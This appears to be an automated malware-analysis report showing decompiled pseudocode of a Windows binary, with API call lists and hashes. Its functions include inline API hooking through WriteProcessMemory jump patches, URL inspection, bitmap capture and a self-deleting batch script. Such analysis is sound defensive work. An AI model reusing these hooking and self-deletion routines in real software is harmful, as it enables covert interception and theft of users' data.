    							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
    						}
    						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
    					}
    				}
    				return _t50;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00419C9D
    • ReleaseMutex.KERNEL32(?), ref: 00419CBC
    • GetWindowRect.USER32 ref: 00419CC9
    • IsRectEmpty.USER32 ref: 00419D4D
    • GetWindowLongW.USER32(?,000000F0), ref: 00419D5C
    • GetParent.USER32(?), ref: 00419D72
    • MapWindowPoints.USER32 ref: 00419D7B
    • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00419D9F
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File
    Similarity
    • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
    • String ID:
    • API String ID: 2634726239-0
    • Opcode ID: 74d79d5d255c72d56ea8efc558eb35c3b8a67add84ad0edb3f99780bece9d78a
    • Instruction ID: cb5d7c41d36cdf1ee14a90c2e80689a5c8d78c459ccd8f410a7c3d53a9fb4bcc
    • Opcode Fuzzy Hash: 74d79d5d255c72d56ea8efc558eb35c3b8a67add84ad0edb3f99780bece9d78a
    • Instruction Fuzzy Hash: F4416D71D0020AEFDB108FDAEA59AFEBBB4FB04750F10056AE511E6660D7789E80DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0041B5A4(intOrPtr _a4) {
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v32;
    				char _v36;
    				char _v60;
    				char _v72;
    				signed int _v76;
    				char* _v80;
    				void* _v96;
    				intOrPtr _v148;
    				void* _v160;
    				char _v168;
    				char _v272;
    				char _v536;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t128;
    				intOrPtr* _t129;
    				char* _t130;
    				void* _t137;
    				void* _t140;
    				void* _t144;
    				void* _t152;
    				void* _t154;
    				char* _t156;
    				void* _t161;
    				void* _t163;
    				void* _t164;
    				void* _t167;
    				void* _t172;
    				intOrPtr _t174;
    				intOrPtr* _t176;
    				void* _t177;
    				void* _t182;
    				intOrPtr _t186;
    				intOrPtr _t187;
    				signed int _t189;
    				void* _t194;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				int _t204;
    				void* _t207;
    				signed int _t210;
    				void* _t214;
    				signed int _t217;
    				signed int _t218;
    				void* _t219;
    				void* _t224;
    				char* _t227;
    				intOrPtr _t228;
    				char* _t233;
    				char* _t236;
    				intOrPtr _t238;
    				signed int _t239;
    				intOrPtr _t240;
    				void* _t244;
    				void* _t247;
    
    				_t217 = 0;
    				_v16 = 0;
    				_v9 = 0xff;
    				EnterCriticalSection(0x423a34);
    				_t225 =  *0x423a50;
    				if( *0x423a50 == 0 ||  *0x423a4c == 0) {
    					_t240 = _a4;
    				} else {
    					_t240 = _a4;
    					_t230 = 0;
    					if(E0041ACD9(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
    						_t210 = E00411789();
    						_v20 = _t210;
    						if(_t210 != 0) {
    							_t214 = E0041AD93(0, 4,  &_v20,  *0x423a4c);
    							_push(_v20);
    							if(_t214 == 0) {
    								E00411CFE();
    							}
    							E004117F4(_t225);
    						}
    						E00411CFE( *0x423a4c);
    						E00411CFE( *0x423a50);
    						 *0x423a4c = _t217;
    						 *0x423a50 = _t217;
    					}
    				}
    				LeaveCriticalSection(0x423a34);
    				_t128 =  *((intOrPtr*)(_t240 + 0x40));
    				_t254 = _t128 - _t217;
    				if(_t128 == _t217) {
    					L38:
    					if((_v16 & 0x00000001) == 0) {
    						_t187 =  *((intOrPtr*)(_t240 + 0x44));
    						_t272 = _t187 - _t217;
    						if(_t187 != _t217 && E0041AF94(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
    							_v16 = _v16 | 0x00000001;
    						}
    					}
    					if( *(_t240 + 0x20) >= 0x21) {
    						_t182 = 0x10;
    						E00419861(_t182,  &_v72);
    						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
    						if(E00411D6F( &_v72, _t238, 0x21) == 0) {
    							_t186 =  *((intOrPtr*)(_t238 + 0x21));
    							if(_t186 == 0x3b || _t186 == 0) {
    								_v16 = _v16 | 0x00000010;
    							}
    						}
    					}
    					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
    					_v24 = _t217;
    					if(_t129 == _t217 ||  *_t129 == _t217) {
    						L52:
    						_t130 =  *((intOrPtr*)(_t240 + 0x34));
    						__eflags = _t130 - _t217;
    						if(_t130 == _t217) {
    							goto L60;
    						}
    						__eflags =  *_t130;
    						if( *_t130 == 0) {
    							goto L60;
    						}
    						_t167 = 0x12;
    						E00419897(_t167,  &_v168);
    						_t172 = E00412A6C( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
    						_t247 = _t247 + 0xc;
    						goto L55;
    					} else {
    						_t176 =  *((intOrPtr*)(_t240 + 0x30));
    						if(_t176 == _t217 ||  *_t176 == _t217) {
    							goto L52;
    						} else {
    							_t177 = 0x11;
    							E00419897(_t177,  &_v272);
    							_push( *((intOrPtr*)(_a4 + 0x30)));
    							_t172 = E00412A6C( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
    							_t247 = _t247 + 0x10;
    							L55:
    							if(_t172 > _t217) {
    								_t174 = E004130AD(_v24, _t172 + _t172);
    								if( *0x423a54 != _t174) {
    									_t64 =  &_v16;
    									 *_t64 = _v16 | 0x00000020;
    									__eflags =  *_t64;
    									 *0x423a54 = _t174;
    								} else {
    									E00411CFE(_v24);
    									_v24 = _t217;
    								}
    							}
    							_t240 = _a4;
    							L60:
    							if(_v9 != 0xff) {
    								__eflags = _v9 - 1;
    								if(_v9 != 1) {
    									L67:
    									if((_v16 & 0x00000008) == 0) {
    										L93:
    										E00411CFE(_v24);
    										_t218 = _v16;
    										if((_t218 & 0x00000001) == 0) {
    											if(E0041AFFC(_t230, _t240) != 0) {
    												_t218 = _t218 | 0x00000002;
    											}
    											if((_t218 & 0x00000010) != 0 && E0041B3B6(_t240, _t230) != 0) {
    												_t218 = _t218 | 0x00000004;
    											}
    										}
    										return _t218;
    									}
    									_t136 =  *(_t240 + 0x28);
    									_t219 = 0;
    									if( *(_t240 + 0x28) != 0) {
    										__eflags = _v16 & 0x00000010;
    										if((_v16 & 0x00000010) == 0) {
    											__eflags =  *(_t240 + 0x20);
    											if( *(_t240 + 0x20) != 0) {
    												L92:
    												_v16 = _v16 & 0xfffffff7;
    												goto L93;
    											}
    											_t233 =  &_v36;
    											_t137 = 0xc;
    											E00419861(_t137, _t233);
    											_push(_t233);
    											_push(9);
    											L81:
    											_pop(_t140);
    											_v20 = E0041215C(_t140);
    											L82:
    											if(_v20 == 0) {
    												goto L92;
    											}
    											E004102B4( &_v32);
    											_t144 = E00411F3E( *(_t240 + 0xc), 0,  *(_t240 + 8));
    											_t235 = _t144;
    											if(_t144 != 0) {
    												_t230 = 0x3c;
    												E00411DB1( &_v160,  &_v160, 0, _t230);
    												_v160 = _t230;
    												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
    													_t152 = 0xa;
    													E00419897(_t152,  &_v272);
    													_t154 = 0xd;
    													E00419897(_t154,  &_v60);
    													_t227 =  *(_a4 + 0x10);
    													_t156 = 0x403180;
    													_t230 =  ==  ? 0x403180 : _v24;
    													_t244 =  ==  ? 0x403180 : _v32;
    													if(_t227 == 0) {
    														_t227 = "-";
    													}
    													if((_v16 & 0x00000001) != 0) {
    														_t156 =  &_v60;
    													}
    													_push(_v20);
    													_push(_t230);
    													_push(_t244);
    													_push(_t227);
    													_push(_t156);
    													_t161 = E00407CCA(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
    													_t240 = _a4;
    													_t219 = _t161;
    												}
    												E00411CFE(_t235);
    											}
    											E00411CFE(_v32);
    											E00411CFE(_v20);
    											if(_t219 != 0) {
    												goto L93;
    											} else {
    												goto L92;
    											}
    										}
    										_t230 = E0041215C(_t136,  *((intOrPtr*)(_t240 + 0x24)));
    										_v20 = _t230;
    										__eflags = _t230;
    										if(_t230 == 0) {
    											goto L92;
    										}
    										_t163 = 0;
    										__eflags =  *(_t240 + 0x28);
    										if( *(_t240 + 0x28) <= 0) {
    											goto L82;
    										} else {
    											goto L73;
    										}
    										do {
    											L73:
    											_t228 =  *((intOrPtr*)(_t163 + _t230));
    											__eflags = _t228 - 0x26;
    											if(_t228 != 0x26) {
    												__eflags = _t228 - 0x2b;
    												if(_t228 == 0x2b) {
    													 *((char*)(_t163 + _t230)) = 0x20;
    												}
    											} else {
    												 *((char*)(_t163 + _t230)) = 0xa;
    											}
    											_t163 = _t163 + 1;
    											__eflags = _t163 -  *(_t240 + 0x28);
    										} while (_t163 <  *(_t240 + 0x28));
    										goto L82;
    									}
    									_t236 =  &_v36;
    									_t164 = 0xb;
    									E00419861(_t164, _t236);
    									_push(_t236);
    									_push(7);
    									goto L81;
    								}
    								L66:
    								_v16 = _v16 | 0x00000008;
    								goto L67;
    							}
    							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
    								if((_v16 & 0x00000020) == 0) {
    									goto L67;
    								}
    							}
    							goto L66;
    						}
    					}
    				}
    				_t189 = E0041787A( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
    				_t225 = _v32;
    				_v20 = _t189;
    				if(E00412B90(_t189, _v32) == 0) {
    					L37:
    					E00411CFE(_v20);
    					_t217 = 0;
    					goto L38;
    				} else {
    					_t239 = _v20;
    					do {
    						_t225 = _t239 + 1;
    						if( *_t225 == 0) {
    							goto L36;
    						}
    						_t194 =  *_t239;
    						if(_t194 == 0x21) {
    							L22:
    							_t239 = _t225;
    							L23:
    							_t230 = 0;
    							_t225 = _t239;
    							if(E0041ACD9(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
    								goto L36;
    							}
    							_t197 = _t224;
    							if(_t197 == 0) {
    								_v9 = 0;
    								L35:
    								if(_t224 != 2) {
    									goto L37;
    								}
    								goto L36;
    							}
    							_t198 = _t197 - 1;
    							if(_t198 == 0) {
    								L30:
    								_v9 = 1;
    								goto L35;
    							}
    							_t199 = _t198 - 1;
    							if(_t199 == 0) {
    								_t230 = 0x3c;
    								E00411DB1( &_v96,  &_v96, 0, 0);
    								_v80 =  &_v536;
    								_v96 = 0;
    								_v76 = 0x103;
    								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
    								__eflags = _t204 - 1;
    								if(_t204 == 1) {
    									__eflags = _v76;
    									if(_v76 > 0) {
    										E0041026E( &_v536);
    									}
    								}
    								goto L35;
    							}
    							_t207 = _t199 - 1;
    							if(_t207 == 0 || _t207 == 1) {
    								_v16 = _v16 | 0x00000001;
    								goto L30;
    							} else {
    								goto L35;
    							}
    						}
    						if(_t194 == 0x2d) {
    							goto L22;
    						}
    						if(_t194 == 0x40) {
    							goto L22;
    						}
    						if(_t194 == 0x5e) {
    							_t224 = 4;
    							goto L22;
    						} else {
    							_t224 = 0;
    							goto L23;
    						}
    						L36:
    						_t239 = E00412BCE(_t239, 1);
    					} while (_t239 != 0);
    					goto L37;
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00423A34,?,?,?), ref: 0041B5BF
    • LeaveCriticalSection.KERNEL32(00423A34,?,?,?), ref: 0041B642
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0041B70D
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0041B947
      • Part of subcall function 00411789: CreateMutexW.KERNEL32(00423B98,00000000,00422BC8,00423A34,000000FF,?,0041B5F0,?,?,?,?,?), ref: 004117B1
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
    • String ID: $4:B
    • API String ID: 4018265435-3064615929
    • Opcode ID: 13b8535eedf5a426c6fdaf723c1b452aecf50b6017ffaad2e81fd6cc8aa2b446
    • Instruction ID: 3df4092dcce3a9b944c251b69840733d9bfd9e96f4d588785fa9e0b0c16ebbe1
    • Opcode Fuzzy Hash: 13b8535eedf5a426c6fdaf723c1b452aecf50b6017ffaad2e81fd6cc8aa2b446
    • Instruction Fuzzy Hash: 39D1D371A002099EDF21AFA1C845BEF7BB5EF45304F04442BE951A72A1C77C9DC2CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E00407622(WCHAR* __ecx, signed char* _a4) {
    				char _v268;
    				signed short _v340;
    				char _v743;
    				signed short _v816;
    				char _v1028;
    				short _v1548;
    				short _v1552;
    				intOrPtr _v1556;
    				signed char* _v1560;
    				signed int _v1564;
    				char* _v1568;
    				void* _v1572;
    				intOrPtr _v1576;
    				intOrPtr _v1580;
    				char _v1584;
    				intOrPtr _v1588;
    				signed int _v1592;
    				signed int _v1596;
    				void* _v1597;
    				signed int _v1600;
    				void* __ebx;
    				void* __esi;
    				signed int _t60;
    				signed int _t69;
    				signed int _t71;
    				signed int _t72;
    				signed int _t80;
    				signed int _t83;
    				long _t84;
    				long _t85;
    				signed int _t89;
    				signed int _t98;
    				signed int _t101;
    				signed int _t108;
    				signed int _t110;
    				WCHAR* _t123;
    				signed char _t125;
    				signed char* _t131;
    				signed int _t134;
    				void* _t136;
    				void* _t140;
    				signed int _t141;
    
    				_t128 = __ecx;
    				_t131 = _a4;
    				_t60 = E0041CA33(__ecx, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
    				_v1596 = _t60;
    				if(_t60 != 0) {
    					_v1572 =  *0x424024;
    					_v1568 =  &_v268;
    					_v1580 = E0040747E;
    					_v1576 = E004075BA;
    					_v1560 = _t131;
    					E0041CCD2( &_v1028);
    					E00411D3A( &_v268,  &_v743, 0x102);
    					_t69 =  *_t131 & 0x000000ff;
    					__eflags = _t69;
    					if(_t69 == 0) {
    						_t71 = _v816 >> 0x10;
    						__eflags = _t71;
    						_v1596 = _t71;
    						_t72 = _v816 & 0x0000ffff;
    						goto L7;
    					} else {
    						__eflags = _t69 == 1;
    						if(_t69 == 1) {
    							_v1596 = _v340 >> 0x10;
    							_t72 = _v340 & 0x0000ffff;
    							L7:
    							_v1592 = _t72;
    						}
    					}
    					_v1596 = _v1596 * 0xea60;
    					_v1592 = _v1592 * 0xea60;
    					E00411DB1( &_v1028,  &_v1028, 0, 0x2f4);
    					_v1560 = 0;
    					_t80 = E0041CB59();
    					__eflags = _t80;
    					if(_t80 != 0) {
    						do {
    							__eflags =  *_t131;
    							_v1597 = 1;
    							if( *_t131 != 0) {
    								L24:
    								_t83 = E0040B3BB();
    								_t138 = _t83;
    								__eflags = _t83;
    								if(__eflags == 0) {
    									goto L29;
    								} else {
    									_v1596 = E0041787A(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
    									E00411CFE(_t138);
    									__eflags = _v1600;
    									if(_v1600 == 0) {
    										_t131 = _a4;
    										goto L33;
    									} else {
    										_v1564 = _v1564 & 0;
    										_t108 = E00407242(_t128, _t129,  &_v1564, 1);
    										_t131 = _a4;
    										__eflags = _t108;
    										if(_t108 == 0) {
    											L33:
    											_t125 = _v1597;
    										} else {
    											_t131[8] = _t131[8] | 0xffffffff;
    											_t110 = E00407A3F( &_v1584);
    											__eflags = _t110;
    											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
    											E00417CA7( &(_t131[8]));
    											E00411CFE(_v1564);
    										}
    									}
    									E00411CFE(_v1584);
    									__eflags = _t125 - 2;
    									if(_t125 != 2) {
    										__eflags = _t125;
    										if(_t125 != 0) {
    											goto L29;
    										} else {
    											_t84 = _v1596;
    										}
    									} else {
    										_t84 = _v1592;
    									}
    								}
    							} else {
    								asm("sbb ebx, ebx");
    								E00407101( !( ~(_v1548 & 0x0000ffff)) &  &_v1548, _t128, 0);
    								_t123 =  &(_t131[0x122]);
    								_t89 = GetFileAttributesW( &_v1552);
    								__eflags = _t89 - 0xffffffff;
    								if(_t89 == 0xffffffff) {
    									_t89 = GetFileAttributesW(0x4223a8);
    									__eflags = _t89 - 0xffffffff;
    									if(_t89 == 0xffffffff) {
    										goto L29;
    									} else {
    										_t128 = 0x4223a8;
    										goto L14;
    									}
    								} else {
    									_t128 =  &_v1548;
    									L14:
    									_t129 = _t123;
    									E0041209F(_t89 | 0xffffffff, _t128, _t129);
    									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
    									__eflags = _t140 - 0xffffffff;
    									if(_t140 == 0xffffffff) {
    										L28:
    										E00417064(_t123);
    										goto L29;
    									} else {
    										_v1560 = E0041703D(_t128, _t140);
    										_t134 = _t129;
    										CloseHandle(_t140);
    										__eflags = _v1560 - 0xffffffff;
    										if(_v1560 != 0xffffffff) {
    											L17:
    											__eflags = _t134;
    											if(__eflags > 0) {
    												goto L28;
    											} else {
    												if(__eflags < 0) {
    													L20:
    													_t98 = lstrcmpiW(_t123,  &_v1548);
    													__eflags = _t98;
    													if(_t98 == 0) {
    														goto L24;
    													} else {
    														_t141 = E0041CA33(_t128, 0x8793aef2, 2);
    														__eflags = _t141;
    														if(_t141 == 0) {
    															L29:
    															_t131 = _a4;
    															_t84 = 0x7530;
    														} else {
    															_t101 = MoveFileExW(_t123,  &_v1548, 0xb);
    															__eflags = _t101;
    															if(_t101 == 0) {
    																goto L29;
    															} else {
    																E004154D1(_t141);
    																__eflags = _t101 | 0xffffffff;
    																_t128 =  &_v1552;
    																_t129 = _t123;
    																E0041209F(_t101 | 0xffffffff,  &_v1552, _t123);
    																goto L24;
    															}
    														}
    													}
    												} else {
    													__eflags = _v1556 - 0xffffffff;
    													if(_v1556 > 0xffffffff) {
    														goto L28;
    													} else {
    														goto L20;
    													}
    												}
    											}
    										} else {
    											__eflags = _t134;
    											if(_t134 == 0) {
    												goto L28;
    											} else {
    												goto L17;
    											}
    										}
    									}
    								}
    							}
    							_t85 = WaitForSingleObject( *0x424024, _t84);
    							__eflags = _t85 - 0x102;
    						} while (_t85 == 0x102);
    					}
    					E004154D1(_v1588);
    					_t136 = 0;
    				} else {
    					_t136 = 1;
    				}
    				E00411CFE(_t131);
    				return _t136;
    			}

    APIs
      • Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54
    • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000002F4,?,?,00000102), ref: 0040776A
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004077A3
    • CloseHandle.KERNEL32(00000000,00000000), ref: 004077C1
    • lstrcmpiW.KERNEL32(?,?), ref: 004077F1
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
    • String ID:
    • API String ID: 503543330-0
    • Opcode ID: bd98d27c259e255319321df5aced84edada47899d7b22f6d1ea45ac37e3e4186
    • Instruction ID: f133d4a1a4bd2e659239ae874d5d9fe09090d8b73be04d01fab6ca3c837ab7e8
    • Opcode Fuzzy Hash: bd98d27c259e255319321df5aced84edada47899d7b22f6d1ea45ac37e3e4186
    • Instruction Fuzzy Hash: A271C371908351ABD310EB34C885AABB7E8AF84314F104A3FF595A72D1D738E945C79B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00416545(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
    				long _v8;
    				DWORD* _v12;
    				intOrPtr _v47;
    				void _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t47;
    				void* _t58;
    				intOrPtr _t61;
    				void* _t62;
    				void* _t63;
    				intOrPtr* _t66;
    				long _t68;
    				DWORD* _t69;
    				void* _t71;
    
    				_t63 = __edx;
    				_t61 = __ecx;
    				_t58 = __eax;
    				_t69 = 0;
    				_v12 = 0;
    				if(E00416500(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
    					L18:
    					return _v12;
    				} else {
    					E00411DB1( &_v48,  &_v48, 0xffffff90, 0x23);
    					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
    						L17:
    						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
    						goto L18;
    					} else {
    						_t66 =  &_v48;
    						_push(0);
    						_push(_t66);
    						while(1) {
    							_t47 = E0041D820(_t58, _t61, _t63, _t66, _t69);
    							if(_t47 == 0xffffffff) {
    								break;
    							}
    							_t69 = _t69 + _t47;
    							if(_t69 > 0x1e) {
    								L16:
    								goto L17;
    							}
    							_t61 =  *_t66;
    							if(_t61 == 0xe9 || _t61 == 0xe8) {
    								if(_t47 == 5) {
    									_t10 =  &_a8; // 0x422020
    									 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 -  *_t10;
    								}
    							}
    							_push(0);
    							if(_t69 >= 5) {
    								_t16 =  &_a8; // 0x422020
    								_t17 = _t69 + 5; // 0x5
    								_t68 = _t17;
    								 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 -  *_t16 - 5;
    								_t21 =  &_a8; // 0x422020
    								 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
    								if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t68, ??) != 0) {
    									_t62 = _a4;
    									_v48 = 0xe9;
    									_v47 = _t58 - _t62 - 5;
    									E00404C12(_t62, _a8);
    									if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
    										_v12 = _t68;
    									}
    								}
    								goto L16;
    							}
    							_t66 = _t71 + _t69 - 0x2c;
    							_push(_t66);
    						}
    						goto L16;
    					}
    				}
    			}





















    APIs
      • Part of subcall function 00416500: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,00404BB2,00000000,00000000,00000034,00404F3D,00422020,00000000), ref: 00416515
    • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,0041C5EC,-00000008,00000034,?,?,00404CD3,?,00000000,?,?,00404F3D,00422020), ref: 00416572
    • ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,00404CD3,?,00000000,?,?,00404F3D), ref: 00416599
    • WriteProcessMemory.KERNEL32(000000FF, B,?,00000005,00000000,?,00000000,00000000,?,?,00404CD3,?,00000000,?,?,00404F3D), ref: 00416613
    • WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,00404CD3,?,00000000,?,?,00404F3D,00422020,00000000,0041C5EC), ref: 0041663B
    • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,0041C5EC,0041C5EC,?,?,00404CD3,?,00000000,?,?,00404F3D,00422020,00000000,0041C5EC), ref: 00416653
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
    • String ID: B
    • API String ID: 390532180-3394935788
    • Opcode ID: 776bf14a539508c82048bacf09a919d6e01f1839650257c1c2e6dce6f4d36c7f
    • Instruction ID: 344bcddd1ac83043effed485cb81ecf11fe29ce293b001ad2d82495a68071c1f
    • Opcode Fuzzy Hash: 776bf14a539508c82048bacf09a919d6e01f1839650257c1c2e6dce6f4d36c7f
    • Instruction Fuzzy Hash: 43319172900218BBDF109FB8DD45EDE7BA9EB09330F118316FA31A62D0C634D980CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E004182AC(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, char _a12, void* _a16, long _a20, void* _a24) {
    				int _v8;
    				void* _t37;
    				long _t38;
    				struct HBITMAP__* _t46;
    				void* _t47;
    				signed int _t56;
    				signed int _t57;
    				BITMAPINFO** _t62;
    				BITMAPINFO* _t64;
    
    				_t57 = __edx;
    				_v8 = 0;
    				_t64 = E00411CCE(0x428);
    				if(_t64 == 0) {
    					L14:
    					if(_a24 != 0) {
    						DeleteObject(_a24);
    					}
    					L16:
    					return _v8;
    				}
    				_t64->bmiHeader = 0x28;
    				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
    					L13:
    					E00411CFE(_t64);
    					goto L14;
    				} else {
    					DeleteObject(_a24);
    					asm("cdq");
    					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
    					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
    					_a24 = 0;
    					_t64->bmiHeader.biHeight = _t56;
    					if(_t37 == 0) {
    						L7:
    						_t64->bmiHeader.biClrUsed = 0;
    						_push(8);
    						_t64->bmiHeader.biClrImportant = 0;
    						L8:
    						_pop(_t38);
    						_t64->bmiHeader.biBitCount = _t38;
    						L9:
    						_t62 = _a8;
    						asm("cdq");
    						_t58 = _t57 & 0x00000007;
    						asm("cdq");
    						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
    						_t64->bmiHeader.biCompression = 0;
    						if(_t62 != 0) {
    							 *_t62 = _t64;
    						}
    						_t21 =  &_a12; // 0x422938
    						_t46 = CreateDIBSection(_a4, _t64, 0,  *_t21, _a16, _a20);
    						_v8 = _t46;
    						if(_t46 == 0 || _t62 == 0) {
    							goto L13;
    						} else {
    							goto L16;
    						}
    					}
    					_t47 = _t37 - 3;
    					if(_t47 == 0) {
    						goto L7;
    					}
    					if(_t47 != 0x14) {
    						goto L9;
    					}
    					_push(0x20);
    					goto L8;
    				}
    			}













    APIs
    • GetDIBits.GDI32(00000000,0040B95D,00000000,00000001,00000000,00000000,00000000), ref: 004182E4
    • GetDIBits.GDI32(00000000,0040B95D,00000000,00000001,00000000,00000000,00000000), ref: 004182FA
    • DeleteObject.GDI32(0040B95D), ref: 00418307
    • CreateDIBSection.GDI32(?,00000000,00000000,8)B,2937498D,?), ref: 00418377
    • DeleteObject.GDI32(0040B95D), ref: 00418396
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: BitsDeleteObject$CreateSection
    • String ID: 8)B
    • API String ID: 1423349713-162386541
    • Opcode ID: c74de67ebe218fc1b411bd43ad03660a073d4c96930d457d5becde17fc99020f
    • Instruction ID: 4c8e80cba7744a328a93fd20ddd398eb345ff42b357a33bc68e62cb8db9297a0
    • Opcode Fuzzy Hash: c74de67ebe218fc1b411bd43ad03660a073d4c96930d457d5becde17fc99020f
    • Instruction Fuzzy Hash: 5431B37210020EAFDF209F65CD849AF7AE9EF14740B08852EF955D6660CB36DD918B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E004137BE(void* __ebx, void* __edi, char _a4) {
    				short _v24;
    				intOrPtr _v28;
    				char _v72;
    				short _v592;
    				char _v852;
    				char _v1392;
    				void* _t35;
    				char _t56;
    
    				if(E00417085(L"bat",  &_v592) == 0) {
    					L7:
    					return 0;
    				}
    				CharToOemW( &_v592,  &_v852);
    				_push( &_v852);
    				if(E00412AC2( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
    					L6:
    					E00417064( &_v592);
    					goto L7;
    				}
    				_t35 = E00416EB9( &_v592, _a4, _t31);
    				E00411CFE(_a4);
    				if(_t35 == 0) {
    					goto L6;
    				}
    				_push(__edi);
    				_push( &_v592);
    				if(E004129F1( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
    					goto L6;
    				} else {
    					_t56 = 0x44;
    					E00411DB1( &_v72,  &_v72, 0, _t56);
    					_v24 = 0;
    					_v72 = _t56;
    					_v28 = 1;
    					return E004135C5( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
    				}
    			}












    APIs
      • Part of subcall function 00417085: GetTempPathW.KERNEL32(000000F6,?), ref: 0041709C
    • CharToOemW.USER32 ref: 004137EE
      • Part of subcall function 00416EB9: CreateFileW.KERNEL32(004137D8,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416ED3
